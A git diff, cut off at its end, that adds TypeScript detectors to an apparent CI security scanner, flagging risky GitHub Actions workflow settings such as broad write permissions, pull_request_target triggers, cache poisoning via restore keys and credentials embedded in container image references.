b/src/layer2-static/detectors/workflow-anonymous-definition.ts new file mode 100644 index 0000000..8899775 --- /dev/null +++ b/src/layer2-static/detectors/workflow-anonymous-definition.ts @@ -0,0 +1,64 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowAnonymousDefinitionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +export function detectWorkflowAnonymousDefinition( + input: WorkflowAnonymousDefinitionInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const root = asRecord(input.parsed); + const name = typeof root?.name === "string" ? root.name.trim() : ""; + if (name.length > 0) { + return []; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["name:"], + fallbackValue: "workflow has no top-level name", + }); + + return [ + { + rule_id: "workflow-anonymous-definition", + finding_id: `WORKFLOW_ANONYMOUS_DEFINITION-${input.filePath}`, + severity: "LOW", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: "name" }, + description: + "Workflow omits a top-level name, reducing review clarity and incident traceability", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-200", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Add an explicit top-level workflow name"], + evidence: evidence?.evidence ?? null, + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-archived-uses.ts b/src/layer2-static/detectors/workflow-archived-uses.ts new file mode 100644 index 0000000..3d75f4d --- /dev/null +++ b/src/layer2-static/detectors/workflow-archived-uses.ts @@ -0,0 +1,193 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowArchivedUsesInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface RepositoryUseTarget { + raw: string; + owner: string; + repo: string; +} + +type FetchFn = typeof fetch; + +const archivedRepoCacheByFetch = new WeakMap>(); +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", + "User-Agent": "CodeGate", +} as const; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isExternalRepositoryUse(value: string): boolean { + return value.startsWith("./") || value.startsWith("../") || value.startsWith("docker://"); +} + +function trimTrailingSlashes(value: string): string { + return value.replace(/\/+$/u, ""); +} + +function parseRepositoryUses(value: string): RepositoryUseTarget | null { + const trimmed = value.trim(); + if (trimmed.length === 0 || isExternalRepositoryUse(trimmed)) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimTrailingSlashes(trimmed.slice(0, atIndex).trim()); + const [owner, repo] = slug.split("/"); + if (!owner || !repo) { + return null; + } + + return { + raw: trimmed, + owner: owner.toLowerCase(), + repo: repo.toLowerCase(), + }; +} + +async function isArchivedRepository(owner: string, repo: string): Promise { + const fetchFn = globalThis.fetch; + if (typeof fetchFn !== "function") { + return false; + } + + let cache = archivedRepoCacheByFetch.get(fetchFn); + if (!cache) { + cache = new Map(); + archivedRepoCacheByFetch.set(fetchFn, cache); + } + + const cacheKey = `${owner}/${repo}`; + const cached = cache.get(cacheKey); + if (cached !== undefined) { + return cached; + } + + try { + const response = await fetchFn( + `https://api.github.com/repos/${encodeURIComponent(owner)}/${encodeURIComponent(repo)}`, + { + headers: GITHUB_API_HEADERS, + }, + ); + + if (!response.ok) { + cache.set(cacheKey, false); + return false; + } + + const payload = (await response.json()) as { archived?: unknown } | null; + const archived = Boolean(payload && typeof payload === "object" && payload.archived === true); + cache.set(cacheKey, archived); + return archived; + } catch { + return false; + } +} + +function gatherUsesTargets(parsed: unknown): Array { + const root = asRecord(parsed); + const jobsRecord = asRecord(root?.jobs); + if (!jobsRecord) { + return []; + } + + const targets: Array = []; + const addTarget = (uses: string, field: string): void => { + const parsedUses = parseRepositoryUses(uses); + if (parsedUses) { + targets.push({ + ...parsedUses, + field, + }); + } + }; + + for (const [jobId, jobValue] of Object.entries(jobsRecord)) { + const jobRecord = asRecord(jobValue); + if (!jobRecord) { + continue; + } + + if (typeof jobRecord.uses === "string") { + addTarget(jobRecord.uses, `jobs.${jobId}.uses`); + } + + const steps = Array.isArray(jobRecord.steps) ? jobRecord.steps : []; + steps.forEach((step, stepIndex) => { + const stepRecord = asRecord(step); + if (stepRecord && typeof stepRecord.uses === "string") { + addTarget(stepRecord.uses, `jobs.${jobId}.steps[${stepIndex}].uses`); + } + }); + } + + return targets; +} + +export async function detectWorkflowArchivedUses( + input: WorkflowArchivedUsesInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const targets = gatherUsesTargets(input.parsed); + const findings: Finding[] = []; + + for (const target of targets) { + if (!(await isArchivedRepository(target.owner, target.repo))) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [target.raw, `${target.owner}/${target.repo}`], + fallbackValue: target.raw, + }); + + findings.push({ + rule_id: "workflow-archived-uses", + finding_id: `WORKFLOW_ARCHIVED_USES-${input.filePath}-${target.field}`, + severity: "MEDIUM", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: target.field }, + description: "Workflow action or reusable workflow comes from an archived repository", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Replace the archived repository reference with an actively maintained alternative", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-artipacked.ts b/src/layer2-static/detectors/workflow-artipacked.ts new file mode 100644 index 0000000..6739115 --- /dev/null +++ b/src/layer2-static/detectors/workflow-artipacked.ts @@ -0,0 +1,81 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowArtipackedInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function isCheckoutStep(uses: string | undefined): boolean { + return typeof uses === "string" && /^actions\/checkout(?:@.+)?$/iu.test(uses.trim()); +} + +function persistsCredentials(value: unknown): boolean { + if (typeof value !== "string") { + return true; + } + + return value.trim().toLowerCase() !== "false"; +} + +export function detectWorkflowArtipacked(input: WorkflowArtipackedInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!isCheckoutStep(step.uses)) { + return; + } + + if (!persistsCredentials(step.with?.["persist-credentials"])) { + return; + } + + const searchTerms = ["persist-credentials: true"]; + if (step.uses) { + searchTerms.push(step.uses); + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms, + fallbackValue: "actions/checkout persists credentials on disk", + }); + + findings.push({ + rule_id: "workflow-artipacked", + finding_id: `WORKFLOW_ARTIPACKED-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].with.persist-credentials` }, + description: "Checkout step persists credentials on disk", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-922", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Set actions/checkout persist-credentials to false unless the workflow explicitly needs Git credentials", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-bot-conditions.ts b/src/layer2-static/detectors/workflow-bot-conditions.ts new file mode 100644 index 0000000..ba6b8ee --- /dev/null +++ b/src/layer2-static/detectors/workflow-bot-conditions.ts @@ -0,0 +1,141 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowBotConditionsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface ConditionalStep { + jobId: string; + stepIndex?: number; + condition: string; + locationField: string; + run?: string; + uses?: string; +} + +const BOT_CONDITION_PATTERN = + /github\.actor\s*(?:==|!=)\s*['"](?:dependabot\[bot\]|renovate\[bot\]|github-actions\[bot\])['"]/iu; +const PRIVILEGED_RUN_TOKENS = ["publish", "deploy", "release", "npm publish", "gh release"]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function gatherConditionalSteps(parsed: unknown): ConditionalStep[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const steps: ConditionalStep[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const stepEntries = Array.isArray(job?.steps) ? job.steps : []; + const jobCondition = typeof job?.if === "string" ? job.if : undefined; + + if (jobCondition) { + const hasPrivilegedStep = stepEntries.some((stepValue) => { + const step = asRecord(stepValue); + const run = typeof step?.run === "string" ? step.run : undefined; + const uses = typeof step?.uses === "string" ? step.uses : undefined; + return isPrivilegedStep(run, uses); + }); + + if (hasPrivilegedStep) { + steps.push({ + jobId, + condition: jobCondition, + locationField: `jobs.${jobId}.if`, + run: stepEntries + .map((stepValue) => asRecord(stepValue)) + .find((step) => step && typeof step.run === "string")?.run as string | undefined, + uses: stepEntries + .map((stepValue) => asRecord(stepValue)) + .find((step) => step && typeof step.uses === "string")?.uses as string | undefined, + }); + } + } + + stepEntries.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step || typeof step.if !== "string") { + return; + } + + steps.push({ + jobId, + stepIndex, + condition: step.if, + locationField: `jobs.${jobId}.steps[${stepIndex}].if`, + run: typeof step.run === "string" ? step.run : undefined, + uses: typeof step.uses === "string" ? step.uses : undefined, + }); + }); + } + + return steps; +} + +function isPrivilegedStep(run: string | undefined, uses: string | undefined): boolean { + const runValue = run?.toLowerCase() ?? ""; + if (PRIVILEGED_RUN_TOKENS.some((token) => runValue.includes(token))) { + return true; + } + return typeof uses === "string" && uses.trim().length > 0; +} + +export function detectWorkflowBotConditions(input: WorkflowBotConditionsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + for (const step of gatherConditionalSteps(input.parsed)) { + if (!BOT_CONDITION_PATTERN.test(step.condition) || !isPrivilegedStep(step.run, step.uses)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.condition, step.run ?? "", step.uses ?? ""], + fallbackValue: step.condition, + }); + + findings.push({ + rule_id: "bot-conditions", + finding_id: `BOT_CONDITIONS-${input.filePath}-${step.locationField}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: step.locationField }, + description: "Privileged workflow step is guarded primarily by bot-actor identity checks", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-287", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Use explicit trust-boundary checks (event type, branch protection, ref, permissions) beyond actor-name conditions", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-cache-poisoning.ts b/src/layer2-static/detectors/workflow-cache-poisoning.ts new file mode 100644 index 0000000..c95a2cb --- /dev/null +++ b/src/layer2-static/detectors/workflow-cache-poisoning.ts @@ -0,0 +1,87 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowCachePoisoningInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const UNTRUSTED_TRIGGERS = new Set(["pull_request", "pull_request_target", "workflow_run"]); + +function normalizeUsesSlug(value: string): string { + const beforeRef = value.split("@")[0] ?? value; + return beforeRef.replace(/\/+$/u, "").toLowerCase(); +} + +function isCacheAction(uses: string): boolean { + return normalizeUsesSlug(uses).startsWith("actions/cache"); +} + +function hasRestoreKeys(stepWith: Record | undefined): string | null { + const restoreKeys = stepWith?.["restore-keys"]?.trim(); + return restoreKeys && restoreKeys.length > 0 ? restoreKeys : null; +} + +export function detectWorkflowCachePoisoning(input: WorkflowCachePoisoningInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const hasUntrustedTrigger = facts.triggers.some((trigger) => UNTRUSTED_TRIGGERS.has(trigger)); + if (!hasUntrustedTrigger) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses || !isCacheAction(uses)) { + return; + } + + const restoreKeys = hasRestoreKeys(step.with); + if (!restoreKeys) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["restore-keys:", restoreKeys], + fallbackValue: restoreKeys, + }); + + findings.push({ + rule_id: "workflow-cache-poisoning", + finding_id: `WORKFLOW_CACHE_POISONING-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].with.restore-keys` }, + description: "Cache restore keys can enable cache poisoning on untrusted workflow triggers", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-345", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Remove broad restore keys or restrict cache reuse to trusted branches and jobs", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-concurrency-limits.ts b/src/layer2-static/detectors/workflow-concurrency-limits.ts new file mode 100644 index 0000000..5ca45fb --- /dev/null +++ b/src/layer2-static/detectors/workflow-concurrency-limits.ts @@ -0,0 +1,96 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowConcurrencyLimitsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function hasRiskyTrigger(triggers: string[]): boolean { + return triggers.some( + (trigger) => + trigger === "pull_request_target" || + trigger === "workflow_run" || + trigger === "issue_comment", + ); +} + +function hasWorkflowConcurrency(parsed: unknown): boolean { + const root = asRecord(parsed); + const concurrency = root?.concurrency; + if (typeof concurrency === "string") { + return concurrency.trim().length > 0; + } + return asRecord(concurrency) !== null; +} + +function hasAnyJobConcurrency(parsed: unknown): boolean { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return false; + } + return Object.values(jobs).some((jobValue) => { + const job = asRecord(jobValue); + const concurrency = job?.concurrency; + if (typeof concurrency === "string") { + return concurrency.trim().length > 0; + } + return asRecord(concurrency) !== null; + }); +} + +export function detectWorkflowConcurrencyLimits(input: WorkflowConcurrencyLimitsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts || !hasRiskyTrigger(facts.triggers)) { + return []; + } + + if (hasWorkflowConcurrency(input.parsed) || hasAnyJobConcurrency(input.parsed)) { + return []; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["pull_request_target", "workflow_run", "issue_comment", "concurrency"], + fallbackValue: "risky trigger without concurrency limits", + }); + + return [ + { + rule_id: "workflow-concurrency-limits", + finding_id: `WORKFLOW_CONCURRENCY_LIMITS-${input.filePath}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: "concurrency" }, + description: + "Workflow uses risky triggers without concurrency controls, increasing race and replay risk", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-362", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Define workflow- or job-level concurrency groups with cancel-in-progress controls", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-dangerous-triggers.ts b/src/layer2-static/detectors/workflow-dangerous-triggers.ts new file mode 100644 index 0000000..01c536f --- /dev/null +++ b/src/layer2-static/detectors/workflow-dangerous-triggers.ts @@ -0,0 +1,49 @@ +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +const DANGEROUS_TRIGGERS = new Set(["pull_request_target", "workflow_run"]); + +export interface WorkflowDangerousTriggersInput { + filePath: string; + parsed: unknown; +} + +export function detectWorkflowDangerousTriggers(input: WorkflowDangerousTriggersInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const triggers = facts.triggers.filter((trigger) => DANGEROUS_TRIGGERS.has(trigger)); + if (triggers.length === 0) { + return []; + } + + return [ + { + rule_id: "workflow-dangerous-triggers", + finding_id: `WORKFLOW_DANGEROUS_TRIGGERS-${input.filePath}`, + severity: "HIGH", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: "on" }, + description: `Workflow uses high-risk trigger(s): ${triggers.join(", ")}`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-693", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Restrict trigger conditions and avoid running untrusted pull request data in privileged contexts", + ], + evidence: triggers.join(", "), + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-excessive-permissions.ts b/src/layer2-static/detectors/workflow-excessive-permissions.ts new file mode 100644 index 0000000..759df49 --- /dev/null +++ b/src/layer2-static/detectors/workflow-excessive-permissions.ts @@ -0,0 +1,83 @@ +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowExcessivePermissionsInput { + filePath: string; + parsed: unknown; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + return Object.values(value as Record).some( + (permission) => permission === "write", + ); +} + +export function detectWorkflowExcessivePermissions( + input: WorkflowExcessivePermissionsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + if (hasWritePermission(facts.workflowPermissions)) { + findings.push({ + rule_id: "workflow-excessive-permissions", + finding_id: `WORKFLOW_EXCESSIVE_PERMISSIONS-WORKFLOW-${input.filePath}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: "permissions" }, + description: "Workflow defines overly broad write permissions", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Scope GITHUB_TOKEN permissions to least privilege"], + evidence: typeof facts.workflowPermissions === "string" ? facts.workflowPermissions : null, + suppressed: false, + }); + } + + facts.jobs.forEach((job, index) => { + if (!hasWritePermission(job.permissions)) { + return; + } + + findings.push({ + rule_id: "workflow-excessive-permissions", + finding_id: `WORKFLOW_EXCESSIVE_PERMISSIONS-JOB-${input.filePath}-${index}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.permissions` }, + description: "Job defines overly broad write permissions", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Reduce job-level permissions to required read scopes"], + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-forbidden-uses.ts b/src/layer2-static/detectors/workflow-forbidden-uses.ts new file mode 100644 index 0000000..ce027f2 --- /dev/null +++ b/src/layer2-static/detectors/workflow-forbidden-uses.ts @@ -0,0 +1,199 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowForbiddenUsesRuleConfig { + allow?: string[]; + deny?: string[]; +} + +export interface WorkflowForbiddenUsesInput { + filePath: string; + parsed: unknown; + textContent: string; + config?: WorkflowForbiddenUsesRuleConfig; +} + +interface CompiledForbiddenPolicy { + mode: "allow" | "deny"; + allow: RegExp[]; + deny: RegExp[]; +} + +function normalizePattern(value: string): string { + return value.replaceAll("\\", "/").trim().toLowerCase(); +} + +function globToRegExp(glob: string): RegExp { + const pattern = normalizePattern(glob); + if (pattern.length === 0) { + return /^$/; + } + + let regex = "^"; + for (let index = 0; index < pattern.length; index += 1) { + const char = pattern[index]; + + if (char === "*") { + if (pattern[index + 1] === "*") { + regex += ".*"; + index += 1; + } else { + regex += "[^/]*"; + } + continue; + } + + if (char === "?") { + regex += "[^/]"; + continue; + } + + regex += char.replace(/[.*+?^${}()|[\]\\]/gu, "\\$&"); + } + + regex += "$"; + return new RegExp(regex); +} + +function compilePatterns(patterns: readonly string[]): RegExp[] { + return patterns.map((pattern) => globToRegExp(pattern)); +} + +function matchesRepositoryPattern(value: string, pattern: RegExp): boolean { + return pattern.test(value.toLowerCase()); +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed + .slice(atIndex + 1) + .trim() + .toLowerCase(); + if (slug.length === 0 || !slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function getForbiddenPolicy( + config: WorkflowForbiddenUsesRuleConfig | undefined, +): CompiledForbiddenPolicy | null { + const allow = config?.allow?.filter((pattern) => pattern.trim().length > 0) ?? []; + const deny = config?.deny?.filter((pattern) => pattern.trim().length > 0) ?? []; + const allowPatterns = compilePatterns(allow); + const denyPatterns = compilePatterns(deny); + + if (allow.length > 0) { + return { + mode: "allow", + allow: allowPatterns, + deny: denyPatterns, + }; + } + if (deny.length > 0) { + return { + mode: "deny", + allow: [], + deny: denyPatterns, + }; + } + return null; +} + +function isForbidden(uses: string, policy: CompiledForbiddenPolicy): boolean { + const parsed = parseRepositoryUses(uses); + if (!parsed) { + return false; + } + + if (policy.deny.some((pattern) => matchesRepositoryPattern(parsed.slug, pattern))) { + return true; + } + + if ( + policy.mode === "allow" && + !policy.allow.some((pattern) => matchesRepositoryPattern(parsed.slug, pattern)) + ) { + return true; + } + + return false; +} + +export function detectWorkflowForbiddenUses(input: WorkflowForbiddenUsesInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const policy = getForbiddenPolicy(input.config); + if (!policy) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses) { + return; + } + + if (!isForbidden(uses, policy)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [uses], + fallbackValue: `uses: ${uses}`, + }); + + findings.push({ + rule_id: "workflow-forbidden-uses", + finding_id: `WORKFLOW_FORBIDDEN_USES-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: + policy.mode === "allow" + ? "Workflow uses repository action outside the configured allowlist" + : "Workflow uses repository action matching the configured denylist", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + policy.mode === "allow" + ? "Add the action to the allowlist only if it is explicitly trusted" + : "Remove the action or move it to an allowlist-only policy if it is trusted", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-github-env.ts b/src/layer2-static/detectors/workflow-github-env.ts new file mode 100644 index 0000000..c7ec36b --- /dev/null +++ b/src/layer2-static/detectors/workflow-github-env.ts @@ -0,0 +1,64 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowGithubEnvInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function writesToGithubEnv(run: string | undefined): boolean { + return typeof run === "string" && />>\s*["']?\$?\{?GITHUB_ENV\}?/iu.test(run); +} + +export function detectWorkflowGithubEnv(input: WorkflowGithubEnvInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!writesToGithubEnv(step.run)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.run ?? "", "GITHUB_ENV"], + fallbackValue: step.run ?? "write to GITHUB_ENV", + }); + + findings.push({ + rule_id: "workflow-github-env", + finding_id: `WORKFLOW_GITHUB_ENV-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: "Run step writes to GITHUB_ENV", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid writing attacker-controlled values to GITHUB_ENV and prefer validated environment variables", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts b/src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts new file mode 100644 index 0000000..4501b0d --- /dev/null +++ b/src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts @@ -0,0 +1,119 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowHardcodedContainerCredentialsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface ImageTarget { + field: string; + image: string; +} + +const CREDENTIAL_IN_IMAGE_PATTERNS = [/:\/\/[^/\s:@]+:[^@\s]+@/iu, /:[^@\s]+@(?!sha256:)/iu]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function gatherImageTargets(parsed: unknown): ImageTarget[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const targets: ImageTarget[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + if (!job) { + continue; + } + + const container = asRecord(job.container); + if (typeof container?.image === "string") { + targets.push({ + field: `jobs.${jobId}.container.image`, + image: container.image, + }); + } + + const services = asRecord(job.services); + if (!services) { + continue; + } + + for (const [serviceName, serviceValue] of Object.entries(services)) { + const service = asRecord(serviceValue); + if (typeof service?.image === "string") { + targets.push({ + field: `jobs.${jobId}.services.${serviceName}.image`, + image: service.image, + }); + } + } + } + + return targets; +} + +function hasEmbeddedCredentials(image: string): boolean { + const value = image.trim(); + return CREDENTIAL_IN_IMAGE_PATTERNS.some((pattern) => pattern.test(value)); +} + +export function detectWorkflowHardcodedContainerCredentials( + input: WorkflowHardcodedContainerCredentialsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + for (const target of gatherImageTargets(input.parsed)) { + if (!hasEmbeddedCredentials(target.image)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [target.image, "image:"], + fallbackValue: target.image, + }); + + findings.push({ + rule_id: "hardcoded-container-credentials", + finding_id: `HARDCODED_CONTAINER_CREDENTIALS-${input.filePath}-${target.field}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: target.field }, + description: "Container image reference appears to embed static credentials", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-798", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Remove embedded credentials from image references and use short-lived registry auth", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-impostor-commit.ts b/src/layer2-static/detectors/workflow-impostor-commit.ts new file mode 100644 index 